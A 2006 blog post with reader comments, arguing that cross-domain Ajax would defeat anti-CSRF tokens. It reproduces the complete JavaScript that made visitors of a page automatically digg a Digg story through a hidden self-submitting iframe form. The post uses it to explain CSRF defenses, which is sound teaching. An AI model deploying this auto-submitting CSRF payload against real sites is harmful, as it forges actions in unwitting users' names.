About the Author

Chris Shiflett

Hi, I’m Chris: web craftsman, community leader, husband, father, and partner at Fictive Kin.


Cross-Domain Ajax Insecurity

I might turn this into a more coherent article. For now, this ad hoc explanation will have to suffice.

Since the birth of Ajax (the name, not the technology), there has been an increased interest in various client-side technologies, especially JavaScript. Those who have forged ahead in an attempt to innovate new ways of applying Ajax have inevitably run into the same-origin security policy of XMLHttpRequest(). As a result, there has been an increasing demand for cross-domain Ajax, and there are several creative techniques in use today to get around the same-origin restriction (none of which I consider cross-domain Ajax).

Today, I read a post from a Ruby developer who claims to debunk misconceptions about the security implications of cross-domain Ajax:

Quite a number of people have been discussing possible cross-domain Ajax security issues recently. These are smart people that generally know their technologies very well, but for some reason are missing some fundamental aspects about Ajax.

He goes on to explain why he thinks cross-domain Ajax is safe. A followup retraction attempts to point out a reason why cross-domain Ajax can be unsafe, a port scanner that has access to your local network.

We don't need cross-domain Ajax for that. I wrote an article three years ago (and was giving talks before that) that demonstrates how XSS and CSRF can be used to penetrate local networks. Jeremiah Grossman recently demonstrated how to use XSS to scan a local network. We even have an example that uses CSRF to make configuration changes to a local Linksys WRTG54G (wireless router). These things are already possible today.

A much more important concern is that cross-domain Ajax effectively eliminates the CSRF safeguard implemented by many web applications. (The rest are probably vulnerable.) To help explain this, consider the recent story that Diggs itself, a clever CSRF attack that causes all visitors to automatically Digg a particular story:

<script type="text/javascript"> 
function fillframe() { 
    mf = window.frames["myframe"]; 
     
    html = '<form name="diggform" action="http://digg.com/diginfull" method="post">'; 
    html = html + ' <input type="hidden" name="id" value="367034"/>'; 
    html = html + ' <input type="hidden" name="orderchange" value="2"/>'; 
    html = html + ' <input type="hidden" name="target" value="http%3A//digg.com/"/>'; 
    html = html + ' <input type="hidden" name="category" value="0"/>'; 
    html = html + ' <input type="hidden" name="page" value="0"/>'; 
    html = html + ' <input type="hidden" name="t" value="undefined"/>'; 
    html = html + ' <input type="hidden" name="row" value="1"/>'; 
    html = html + '</form>'; 
     
    mf.document.body.innerHTML = html; 
    mf.document.diggform.submit(); 
} 
</script></head> 
<body onload="fillframe();"> 
<iframe name="myframe" style="width:0px;height:0px;border:0px"></iframe>

There are easier ways to craft this exploit, but that's too off-topic for now.

This exploit no longer works, because Digg fixed it. How did they do that? The request that this generates comes from a valid user and appears to be legitimate, because it abides by the rules imposed by the application. If you spend some time thinking about it, you might be able to come up with a solution, and it will probably be similar to what most people call an anti-CSRF token. Digg now adds a token to its forms. If you Digg a story, your request includes digcheck in addition to the other pieces of relevant information:

id=12345&orderchange=0&target=http%3A//digg.com/&category=security&page=1&t=1&row=1&digcheck=412e11d5317627e48a4b0615c84b9a8f

This value changes and is not valid for any other user or any other story. If digcheck doesn't match, the action is considered invalid. Problem solved.

If you want to exploit Digg in the same way today, you'd need to be able to obtain the digcheck token of another user. If you want to exploit many users (which you probably do, if you want your story to be popular), you'd need to be able to automatically get another user's token, so that it's easy to repeat the process. If you visit Digg and view source, you'll find these tokens in the links to Digg a story. Of course, the tokens you see are only valid for requests from you.

<a href="javascript:wrapper_full(0,5,12345,0,'Security',1,1,'412e11d5317627e48a4b0615c84b9a8f')">digg it</a>

Now, imagine if XMLHttpRequest() allowed cross-domain requests. Because it is JavaScript and executes on the client, you could use it to generate requests to Digg from every user who visits a page that you create elsewhere. You'd also be able to parse the results of those requests, so you could determine each user's digcheck token for the story you wish to have them Digg. The result? The exact same scenario would be possible, and there is nothing Digg could do about it. In fact, there's nothing any web application could do about it.

I don't expect browser developers to dismiss the same-origin security policy without a thorough understanding of the consequences, so my only purpose in blogging this is to clear up some of the misinformation that has been published in various places. It's worth noting that XSS vulnerabilities allow malicious JavaScript to execute within your domain, thereby avoiding the same-domain restrictions. This can have catastrophic consequences. Just ask Myspace.

I'll probably be writing more about Ajax security in the coming months. In the meantime, you should peruse Andrew's Ajax Security PDF.

About this post

Cross-Domain Ajax Insecurity was posted on Wed, 09 Aug 2006. If you liked it, follow me on Twitter or share:

26 comments

1.The Hater said:

Still waiting for something beyond the combination of a buzzword (Ajax) and fear (OMG YOU'LL GET HAXXXORED!) as to what makes Ajax fundamentally different when it comes to web application security. If you pull in JSON from another domain and execute it, that doesn't make Ajax vulnerable, that makes you an idiot (you haven't, I just chose to exaggerate to make a point).

I see more and more posts on Ajax security and when it comes down to it, I just see developers trying to cover their own asses after jumping on the bandwagon without thinking it through first. Then they think they can cover up their own stupidity by pretending they've uncovered a whole new paradigm of web application security when XSS and SQL injection attacks have existed long before widespread Ajax use.

So, yeah...

Let me know when you find something new.

Wed, 09 Aug 2006 at 15:38:14 GMT Link


2.Chris Shiflett said:

You're right that most concerns are no different, but I think you might be making a mistake that I see a lot - considering the security implications only from the perspective of the developer making the Ajax calls.

As this post illustrates, Ajax can also be a tool used by an attacker, so it's important to consider that perspective as well. The Myspace worm would not have been possible without Ajax, so it's naive to think there's nothing new.

Wed, 09 Aug 2006 at 15:46:54 GMT Link


3.The Hater said:

Actually, no. The magic "never trust the user/input" rule still applies. I ALWAYS assume someone will abuse Ajax calls, since not doing so opens up the web application to all of the normal vulnerabilities I take into account when someone simply logs into an application.

Once again, this comes down to the standard rules that developers have ignored in their eagerness to stick a shiny, new acronym on their list of skills or in the title of their new article.

Wed, 09 Aug 2006 at 15:54:58 GMT Link


4.Chris Snyder said:

I don't understand the desire to completely abandon server-side technologies in favor of putting everything on the client. Changing XHR to allow cross-domain requests is not just a bad idea from a security standpoint, it's also a scalability and reliability issue.

Using a server-side proxy allows you (the provider) to cache requests, to verify the content being served on "your" pages, and to gracefully handle the inevitable "unable to connect" errors that will occur when the other domain goes down for some reason.

Not only is it easy to proxy requests, it's the right and responsible thing to do.

Wed, 09 Aug 2006 at 16:01:48 GMT Link


5.Chris Shiflett said:

The Hater,

You should read more about cross-site request forgeries (CSRF). It is one example of an attack that's immune to FIEO (filter input; escape output) alone.

Or, perhaps just try to think of a way Digg could have prevented the self-submitting story by applying the "never trust the user/input rule" that you have noted.

Better yet, try to think of an exploit Samy could have used on Myspace that does not involve Ajax but achieves the same results.

Wed, 09 Aug 2006 at 16:05:16 GMT Link


6.Chris Shiflett said:

Chris,

I agree with you for the most part, but I'm not sure that pushing more responsibility to the client is necessarily a poor scalability decision. As load increases, so do the number of clients who can perform the work. The same cannot be said for your proxy - it seems like a potential bottleneck.

I agree that the proxy technique eliminates the security risks identified in this post. If I knew more about Flash, I'd research the potential implications of cross-domain Ajax using Flash:

http://blog.monstuff.com/Flash4AJAX...ic/Xdomain.html

My initial observation leads me to believe that the target site has to allow these requests in a file called crossdomain.xml.

Wed, 09 Aug 2006 at 16:15:36 GMT Link


7.The Hater said:

I didn't imply that everything came down to filter input, escape output issues. I mean that so far I have yet to see a brand-new vulnerability opened up by the use of Ajax. I see instances where the stakes have risen, since it can spread faster, but I see no fundamentally new vulnerabilities.

Cross-site request forgeries existed before Ajax and you can attack non-Ajax driven sites with it. So why even bring that up? Each example you give me has avoided or muddied the issue rather than actually answering it.

I repeat: Let me know when you find something new.

At this point I should probably point out that I don't pretend to have all the answers or know everything on the subject. I DO, however, have a fair amount of experience and strive to learn more to offer users a better interface while protecting the application/data against everything I can. So before this breaks down into another Shiflett/Esser bitch-fest, please try to keep that in mind. I want to explore this in order to sort things out, not start flame-wars.

Wed, 09 Aug 2006 at 16:17:19 GMT Link


8.Chris Shiflett said:

The Hater,

You'll have a difficult time accusing me of entering into a "bitch fest" with anyone. That's just not my personality.

The reason I bring up CSRF is because it is very relevant to this discussion. Myspace did not have a CSRF vulnerability when it was exploited. Without Ajax, it would have been impossible for Samy to get around their CSRF safeguard. This safeguard is alluded to in point 9 here:

http://namb.la/popular/tech.html

I think it's impossible for a web application to protect against CSRF if it is vulnerable to XSS. (This statement would not be true without Ajax.) I also think it's impossible for any web application to protect against CSRF attacks if cross-domain Ajax is allowed. It's the same risk.

Both XSS and cross-domain Ajax avoid the same-domain security policy, and this post simply tries to explain why that policy is important.

Wed, 09 Aug 2006 at 16:32:15 GMT Link


9.The Hater said:

I disagree. I think that Ajax makes it easier for attackers to exploit these vulnerabilities, but when broken down they don't have anything new about them.

Point 9 on that page looks like a XSS issue. In fact, it looks like the use of the XMLHttpRequest object (and the exploit in its entirety) comes from code injected into the page and not Ajax-driven functionality of MySpace itself.

So, in essence, it seems to me that your post raises several very valid points, but unnecessarily brings Ajax into it. I don't even really see an example of Ajax used to attack until the very end when you say,"Now, imagine if XMLHttpRequest() allowed cross-domain requests."

Wed, 09 Aug 2006 at 16:45:33 GMT Link


10.Chris Shiflett said:

> I disagree.

With which part? You disagree that the same-domain security policy has value?

> Point 9 on that page looks like a XSS issue.

The issue Samy raises is similar to the issue with the self-submitting Digg story. If you wanted to reproduce that exploit today, you would need to be able to obtain the digcheck token of each user who visits your page.

Myspace generates a random token on the verification page for adding a friend. (This safeguard was in place before Samy's worm.) In order to add a friend, your request must include the token that was generated for you on the previous page. It's the same issue.

Without Ajax, it's easy to get a user to submit a request of your choosing (CSRF), but if you want to get a user's token, you need to be able to parse the response to such a request.

> In fact, it looks like the use of the XMLHttpRequest

> object (and the exploit in its entirety) comes from code

> injected into the page and not Ajax-driven functionality

> of MySpace itself.

Yes, of course. This is what I was trying to explain before when I thought you might be considering this from the wrong perspective. (I'm still not sure whether you are - I'm just trying to be clear.) Ajax was used as a tool in the attack, not by Myspace. (Myspace might use Ajax, but that's irrelevant to this particular discussion.)

I agree with you that adding Ajax features to a web application doesn't introduce security implications that weren't already present (although it can make it easier to make a mistake), but I disagree with your assertion that Ajax doesn't introduce anything new.

Despite the XSS vulnerability, the Myspace worm would not have been possible without Ajax. That seems like proof enough to me.

> I don't even really see an example of Ajax used to

> attack until the very end when you say,"Now, imagine if

> XMLHttpRequest() allowed cross-domain requests."

I hope you don't judge this post too harshly, because it was written in haste. (I wasn't kidding about it being ad hoc.) I admit that it takes me a while to get to the point, but the point is that the self-submitting Digg story (an example of CSRF that I think most people can understand) would still be possible if browsers supported cross-domain Ajax, despite the digcheck token.

Wed, 09 Aug 2006 at 17:57:26 GMT Link


11.The Hater said:

> With which part? You disagree that the same-domain security policy has value?

Nope, I disagree on the difficulty of accusing you of entering bitch-fests (*JOKING*).

Really, I disagreed with your statement that,"Without Ajax, it would have been impossible for Samy to get around their CSRF safeguard." It would have proved more difficult, maybe - but not impossible. I'd try to put together a proof-of-concept, but I don't have the time and I don't care that much.

> I agree with you that adding Ajax features to a web application doesn't introduce security implications that weren't already present (although it can make it easier to make a mistake)...

Thank you! I think we've started to understand one another's points.

> ...but I disagree with you that Ajax doesn't introduce anything new.

..wait, what?

> Despite the XSS vulnerability, the Myspace worm would not have been possible without Ajax. That seems like proof enough to me.

MySpace (last I checked...I can't stand the site so I don't keep up on it) allows or allowed Flash, right? You could easily have altered the worm to use Flash's data transfer calls to accomplish the same result in a browser that doesn't support the XMLHttpRequest object. If not Flash, I bet either of us could think of another way if we put our minds to it.

> I hope you don't judge this post too harshly, because it was written in haste. (I wasn't kidding about it being ad hoc.) I admit that it takes me a while to get to the point, but the point is that the self-submitting Digg story (an example of CSRF that I think most people can understand) would still be possible if browsers supported cross-domain Ajax, despite the digcheck token.

The only thing I really, truly despise about the post and similar posts by other developers: the post comes across to me as focusing on Ajax and vulnerabilities that it supposedly brings into an application when, in fact, its availability to attackers should merely reinforce the rules we already know and love and teach. Web Application Security seems to have taken a backseat to everyone crowding around the word "Ajax" rather than using it to extend the ideas. I realize that makes a difficult balancing act, but it always does when a new implementation (or, at least, freshly used implementation) comes into play so rapidly.

Wed, 09 Aug 2006 at 18:31:14 GMT Link


12.cooperpx said:

Dear People, Digest Authentication covered this crap a long time ago. It's not perfect, but it covers all the basics.

If you can't turn on Digest Auth, then you can approximate it in javascript + part of your XML/JSON request handler. Look for a solid MD5 implementation in js as a starting point.

MySpace got exploited because it didn't properly authenticate the source request, made worse by other stupidity. The root of THE PROBLEM IS NOT AJAX, Ajax just made it worse ... faster. They could have had these same holes exploited using different means.

Lets not get rid of power-tools because any idiot could chop off a finger. Some of us want to provide public services, easily used, via XHR that do not need to be locked down. Some of us actually even have the smarts / experience to properly lock down our web applications.

For the rest of you: If I am not mistaken Microsoft's ASP.NET platform, with or without ATLAS, has everything Digg needed built in. Digg obviously elects not to use .NET, and I cannot blame them, but at least they could have learned from them. It's all moot now, because they learned their lesson the hard way.

All I ask is that the pitchforks be put down and not burn all the suspects.

Wed, 09 Aug 2006 at 18:31:21 GMT Link


13.Chris Shiflett said:

If you consider Ajax to be any technology that allows you to send/receive HTTP requests/responses from a client-side context, I would be very interested to see an example exploit that replaces Samy's use of XMLHttpRequest() with something that isn't Ajax.

> The post comes across to me as focusing on Ajax and

> vulnerabilities that it supposedly brings into an

> application when, in fact, its availability to attackers

> should merely reinforce the rules we already know and

> love and teach.

I think I understand your point, and it's valid. Most Ajax security concerns I've seen raised have fallen into this category - they just emphasize what we already know.

But, I think you're unfairly dismissing the point I'm trying to raise, which is that the same-domain policy is important. (Our tangential discussion has been whether Ajax matters at all, and on this point, I think we might just have to agree to disagree.)

I'm no JavaScript expert, but I'll try to craft an exploit that perhaps explains my point much better than I can with words. IE has a configuration option to allow cross-domain Ajax, so that makes a good target platform.

Wed, 09 Aug 2006 at 19:04:45 GMT Link


14.Andrew van der Stock said:

I posted a few days ago to SC-L on ways we can improve the security model for XHR's. It should be up to the primary page to nominate additional sites they'd like to talk to via the XHR request, and then cut off any further changes.

Couple that with a function to declare some fields off limits to the DOM, I think we can satisfy the requirements of both the developers who are keen on (ab)using XHR as well as the users who expect that the apps they use will not compromise them.

eg:

// Before the next line, act as per current JS security model (ie none) for compatibility

document.perm.openassert(); // start permissions assertion

// By default, all permissions are now denied

document.perm.assert('xhr', true); // allow XML HTTP Request to run

document.perm.assert('eval', true); // allow eval (necessary evil for most XHR / JSON)

document.perm.assert('xd', true); // allow resources from other than the source domain, but need to specify them by using addsourcedomain();

document.perm.addsourcedomain('foo.com'); // allow another domain to be accessible by code

document.perm.endassert(); // no more permission entries will be obeyed after this line

Wed, 09 Aug 2006 at 19:10:21 GMT Link


15.The Hater said:

> If you consider Ajax to be any technology that allows you to send/receive HTTP requests/responses from a client-side context, I would be very interested to see an example exploit that replaces Samy's use of XMLHttpRequest() with something that isn't Ajax.

I don't. I consider the use of the XMLHttpRequest in that manner Ajax. I consider using Flash using Flash, using iframes an ugly hack, using image sources an ugly hack and most other hacks ugly hacks.

> But, I think you're unfairly dismissing the point I'm trying to raise, which is that the same-domain policy is important. (Our tangential discussion has been whether Ajax matters at all, and on this point, I think we might just have to agree to disagree.)

I think we actually agree when it comes down to each particular point, though we apparently disagree on agreeing. No more meta-discussion for me, though...

> I'm no JavaScript expert, but I'll try to craft an exploit that perhaps explains my point much better than I can with words. IE has a configuration option to allow cross-domain Ajax, so that makes a good target platform.

I would very much like to see that. And I didn't know IE had that option, where can I find it so I can make freakin' sure it never gets activated?

Wed, 09 Aug 2006 at 19:52:23 GMT Link


16.Chris Shiflett said:

The IE configuration option is described as "access data sources across domains."

Wed, 09 Aug 2006 at 20:03:42 GMT Link


17.James Ward said:

First of all, cross-domain XHR is a really bad idea, especially when combined with XSS attacks. But that's not what my comment is about. We can talk all we want about cross-domain XHR, we can try to get something approved by the W3C, and then we can try to get the browser vendors to implement it. Now honestly, how long is all that going to take? At best we are probably looking at 3 years. And that is assuming that our friends in Redmond decide they actually want to continue enhancing a platform that devalues their own cash cow. But lets assume that happens. Now how long before a large enough percentage of users get this new browser with cross-domain XHR, that we could actually use it in our web applications? Quite a long time... And this is the reason why I'm a Flex developer. The Flash Virtual Machine has the functionality now, plus a bunch of other things the browser can't do. Oh yeah, and 98% of PC's world wide have Flash 6 or better.

So we can talk all we want about how great it would be to have feature x or we can spend time actually building applications that do it. I choose the later with the free Flex SDK.

Disclaimer: I now work for Adobe because I fell in love with Flex.

Wed, 09 Aug 2006 at 21:26:57 GMT Link


18.Julien Couvreur said:

Hi Chris,

You are correct: cross-site requests in Flash require an explicit opt-in from the server, using the crossdomain.xml. That file not only needs to be there, it also needs to identify which foreign domains are allowed to do cross-site requests (which is '*', a wildcard, in most public websites I've seen so far, like Yahoo, Amazon, etc.).

On the other hand, Flash does send the user's cookies.

More generally, in terms of CSRF and form keys (the workaround for the CSRF problem), one could argue that the current design of the web is broken: why allow POSTs from the browser accross sites in the first place? Why not enforce that the browser clearly identify the source of such requests?

Regarding: "Now, imagine if XMLHttpRequest() allowed cross-domain requests."

I don't think that anyone is suggesting that the "same-site policy" of XHR should simply be removed. This obviously leads to a very insecure and dangerous environment.

Here are some variants that seem more reasonable and can be combined:

-XHR accross domains doesn't get any cookies sent

-XHR requests accross domains is clearly labelled as such (server can choose how to handle them)

-XHR accross domains requires explicit opt-in from server

Wed, 09 Aug 2006 at 21:34:58 GMT Link


19.Joseph Crawford said:

Chris,

This is a very informative article, as i have clients who wish that i learn ajax (have yet to start) i will defenatly have to take a look at that security PDF.

Thanks for the heads up on how important AJAX security is.

Wed, 09 Aug 2006 at 23:01:42 GMT Link


20.cooperpx said:

James has it right: Adobe did good with crossdomain.xml and Flex.

Add a similar thing for XHR and guess what, it doesn't solve SQUAT. 'Cause you have Frames, external css, external javascript, images, xml src=, client http tools, current and future browser bugs, and site breakins.

The real reason why people are making a fuss out of "Ajax Insecurity" is because Script Injection / Script Untrust is no longer a trivial concern. The browser (& common folk) can do some freaky cool shit now, and them people are too ignorant to realize what exploits they leave themselves open to.

Here's my solution, the one that's hard work ... the one that doesn't automagically solve everyone's problems overnight.

Trust nobody (except yourself). The only foreign input or resources you should use, is the stuff you can validate before it initializes. ie: Don't include foreign Java, Javascript, Flash, or Objects in your pages... just the ones *only you* have write access to, or ability to validate.

If you do this, then you're free and clear. You've technically SOLVED [your] security issues with the current web platform as we know it.

Of course, all bets are off if somebody gets write access to your files, impersonates your site, or a clients' own compromised installation is used against them. But that isn't within the realm of AJAX or any implementation thereof.

Wed, 09 Aug 2006 at 23:55:44 GMT Link


21.James Burke said:

I know at least some people involved in Firefox have contributed to a discussion with the W3C's webapi group to allow cross domain XHR. See this tracking bug (with a link to the webapi group's proposal):

https://bugzilla.mozilla.org/show_bug.cgi?id=333906

On a related note, I just checked in code to the Dojo Toolkit to allow cross domain XHR by shuttling the XHR request and response between two iframes:

http://dojotoolkit.org/~jburke/XHRIFrameProxy.html

In order for the technique to work, the server has to do an explicit opt-in, and the server can control what URLs have access to what types of requests. These are similar protections to those mentioned in the webapi proposal, but in the iframe proxy approach, some of the protections are done in JavaScript.

Thu, 10 Aug 2006 at 04:48:27 GMT Link


22.Manuel said:

la verdad parecen un par de carajitos peliando por algo a lo cual no van a llegar a un acuerdo.

hablar de ajax y tech es como hablar de Dios mismo. la religion siempre sera algo inexplicable, IE, M$, Ajax, JS, etc idem

Mon, 18 Sep 2006 at 16:23:57 GMT Link


23.Pedram Nimreezi said:

In response to.... document.perm.assert('eval', true); // allow eval (necessary evil for most XHR / JSON)

JSON doesn't need to be eval'd... it can be parsed...

random data coming off the internet should never eval'd...

the only reason eval even works in this context is because

it's javascript.... JSON.org parseJSON is many times safer tho..

Fri, 10 Aug 2007 at 23:18:36 GMT Link


24.Girish said:

Well JSON is a good technique agreed. But the fact is that JSON cannot be used to port currently created applications on AJAX into there cross domain version.

Also another problem is not handling the cookies. Suppose the current webapp running on www.xyx.com sets a cookie xyxID. Now when in a normal nature a same domain ajax call is create that xyxID would be accessible to it. But if I call xyx.com from xyz.com then the cookie would have to be explicitly sent back to xyx.com to be set. THis creates another problem.

For that we still a need a normal ajax call.

An article

<a href ="http://icodeleague.110mb.com/cmsimple/index.php?Website_Development:Cross_Domain_AJAX">http://icodeleague.110mb.com/cmsimple/index.php?Website_Development:Cross_Domain_AJAX</a>

Suggests the use of combined ajax, proxy and an IFRAME to get around it. I liked the approach(I wrote it thats why), but somehow its a lil complicated

Fri, 16 Nov 2007 at 18:12:36 GMT Link


25.Girish said:

http://icodeleague.110mb.com/cmsimp...oss_Domain_AJAX

sry this is the link

Fri, 16 Nov 2007 at 18:14:14 GMT Link


26.Michael said:

Also a little note: the Digg trick would only work if you had your privacy settings set to "Allow all cookies" or else the cookie/session would not work across the iframe or is there an easy way to inject the cookie/session?

Sun, 25 Nov 2007 at 07:05:32 GMT Link


Hello! What’s your name?

Want to comment? Please connect with Twitter to join the discussion.